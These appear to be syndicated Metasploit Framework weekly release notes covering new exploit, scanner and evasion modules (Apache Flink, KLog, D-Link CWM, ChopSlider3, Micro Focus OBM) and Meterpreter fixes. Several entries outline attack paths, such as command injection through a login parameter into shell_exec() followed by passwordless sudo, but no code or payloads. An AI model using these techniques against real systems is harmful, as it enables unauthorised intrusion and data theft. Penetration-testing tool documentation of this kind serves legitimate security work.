Apache Flink JobManager Traversal by 0rich1 – Ant Security FG Lab, Hoa Nguyen – Suncsr Team, and bcoles, which exploitsCVE-2020-17519, adds an auxiliary module that leverages the directory traversal vulnerability within Apache Flink to recover files from the affected server. This vulnerability does not require authentication.
Apache Flink JAR Upload Java Code Execution by Henry Chen, bcoles, and bigger.wing, adds an exploit module that leverages Apache Flink to upload and run an arbitrary JAR file.
Microsoft RDP Web Client Login Enumeration by Matthew Dunn, adds a scanner module that leverages the timing behavior of the web rdp authentication process to determine valid users.
Process Herpaderping evasion technique by Christophe De La Fuente and Johnny Shaw, adds an evasion module that takes advantage of the Process Herpaderping evasion technique.

Enhancements and features

#14784 from bcoles This fixes a bug in the ScadaBR credential dumping module that prevented it from processing response data.
#14617 from zeroSteiner The core Meterpreter and console libraries have been updated to better handle cases where a given implementation of Meterpreter may not support a certain command. Now instead of each version of Meterpreter trying to handle invalid commands, which previously lead to errors, they will instead check if they support that command and then will throw an error message if they do not support that command. Additionally, the output from running the help or ? command inside the meterpreter prompt has been updated so as to not display a command that a given Meterpreter implementation does not support. Tests have also been updated accordingly to support checking this functionality works as expected.
#14670 from adfoster-r7 Word wrapping of Rex tables is now enabled by default for all Rex tables except for those output by the creds and search commands. This feature can optionally be turned off by issuing the features set wrapped_tables false command.
#14735 from adfoster-r7 Updates have been made to require all new modules to now pass RuboCop and msftidy.rb checks prior to being merged into the framework. These checks will now be run automatically on PRs to detect issues rather than users having to run these tools manually to detect code quality issues within their contributions.
#14740 from zeroSteiner This makes a few improvements to the CVE-2021-3156 and adds a couple of features that were left out of the first submission due to time constraints (e.g cleanup and randomisation of the payload library).

Bugs Fixed

#14748 from cdelafuente-r7 A bug has been fixed in the Auxiliary::AuthBrute that caused a crash when the DB_ALL_USERS or DB_ALL_PASS options were set. This has now been addressed.
#14789 from zeroSteiner A bug has been fixed whereby Meterpreter sessions were incorrectly being validated due to the fact that TLV encryption for the session would take place before session verification. The fix now considers Meterpreter sessions valid if they successfully negotiate TLV encryption. This fix also removes the AutoVerifySession datastore option since all valid Meterpreter instances should negotiate TLV encryption automatically.
#14802 from dwelch-r7 A bug within the Kiwi library has been fixed whereby commands passed to Kiwi via the kiwi_cmd command in Metasploit where not being properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it two separate commands to execute rather than one space separated command.
#14812 from dwelch-r7 Restores missing requires for sock5 proxy support.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-02-19 Adam Galway

Post Syndicated from Adam Galway original https://blog.rapid7.com/2021/02/19/metasploit-wrap-up-99/

GSoC Rocks!

Metasploit Wrap-Up

In a rare double whammy, one of our 2020 Google Summer of Code (GSoC) participants has authored a PR containing both enhancements & a new module! Improvements to our SQL injection library now allow PostgreSQL injection, and this new functionality has been verified with both a test module AND a fully functioning module exploiting CVE-2019-13375, a (Postgre)SQL Injection vuln in the D-Link Central WiFi Manager allowing both DB dumping and user insertion in all versions before v1.03R0100_BETA6. Big thanks to red0xff for authoring these changes and showing that students can hack it with the best of them.

King KLog vs Colezilla

Our copious community contributor bcoles has written a new module exploiting CVE-2020-35729, an unauthenticated command injection vulnerability in KLog (An english translated version of their site can be found here). KLog is a Syslog server providing a time stamp service packaged in a Linux VM, and if Google Translate is to be believed, includes "Kamu SM approved SHA-512 hash algorithm has log signing feature", which is nice. By making a POST request to authenticate.php, the module can perform code execution in the VM via the PHP shell_exec() function. Additionally, the KLog VM configuration allows the apache user to execute sudo without supplying a password, ultimately allowing code execution with root privileges.

Short. Sweet. Screenshot.

Wrapping up this wrapup, timwr has fixed an issue with our Java Meterpreter that prevented screenshots from being taken. As an added bonus, it also prevents uploading a screenshot dll on non-native Windows meterpreter sessions.

New Modules (4)

WordPress ChopSlider3 id SQLi Scanner by Callum Murphy, SunCSR, and h00die, which exploits CVE-2020-11530 This adds a new module to exploit a SQL injection vulnerability in iDangero.us ChopSlider 3 WordPress plugin version 3.4 and prior. It is able to remotely dump usernames and password hashes from the WordPress database without any authentication. This vulnerability is identified as CVE-2020-11530.
D-Link Central WiFiManager SQL injection by M3 and Redouane NIBOUCHA, which exploits CVE-2019-13373 GSoC 2020 project supporting SQLi library usage with PostgreSQL. This support comes with a new module utilizing CVE-2019-13373 to dump database information or insert additional users into D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6.
Klog Server authenticate.php user Unauthenticated Command Injection by Metin Yunus Kandemir, b3kc4t, and bcoles, which exploits CVE-2020-35729 This adds an exploit module that targets an unauthenticated command injection vulnerability in Klog Server versions 2.4.1 and below. A POST request to authenticate.php can result in code execution on the target due to improper sanitization of the user parameter, which gets passed to the shell_exec() function. Additionally, Klog Server’s configuration allows the apache user to execute sudo without supplying a password, so this exploit ultimately achieves code execution with root privileges.
Micro Focus Operations Bridge Manager Local Privilege Escalation by Pedro Ribeiro, which exploits ZDI-20-1326 (CVE-2020-11858) Allows privilege escalation assuming victim machine is running a vulnerable version of OBM & user already has a session on said machine that supports Powershell. Module writes payload to specific folder, then sends request to OBM process via the loopback address to trigger payload execution.

Enhancements and features

#14733 from adfoster-r7 Adds the latest rubocop rules
#14747 from dwelch-r7 Updates exploit/linux/http/saltstack_salt_api_cmd_exec to correctly show failure messages to the user under error scenarios
#14756 from bcoles Updates msftidy to warn when a module is missing its Notes metadata
#14762 from adfoster-r7 Adds support for ignoring Rubocop’s ExtraSpacing rules for BinData objects

Bugs Fixed

#14602 from red0xff Improved length detection for Time Based MySQLi injections & expand support for empty strings to hex_encode_strings.
#14738 from timwr Fixes multi/manage/shell_to_meterpreter on macOS by using Python reflection to upgrade a shell session on macOS to a meterpreter session, in memory, without dropping a file to disk
#14751 from bcoles A bug has been fixed within the msftidy.rb developer tool whereby a typo was preventing several checks from being run against exploit modules to ensure they conformed to standards. This has now been fixed, along with some grammar issues that were noticed in related modules.
#14758 from timwr Fix platform check in Meterpreter stdapi screenshot command. This ensures Java Meterpreter can take screenshots on Windows platforms and prevents unnecessarily uploading the screenshot DLL when using the screenshot command on non-native Windows sessions.
#14741 from zeroSteiner Fixes typo for exchange_ecp_dlp_policy target

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from
GitHub: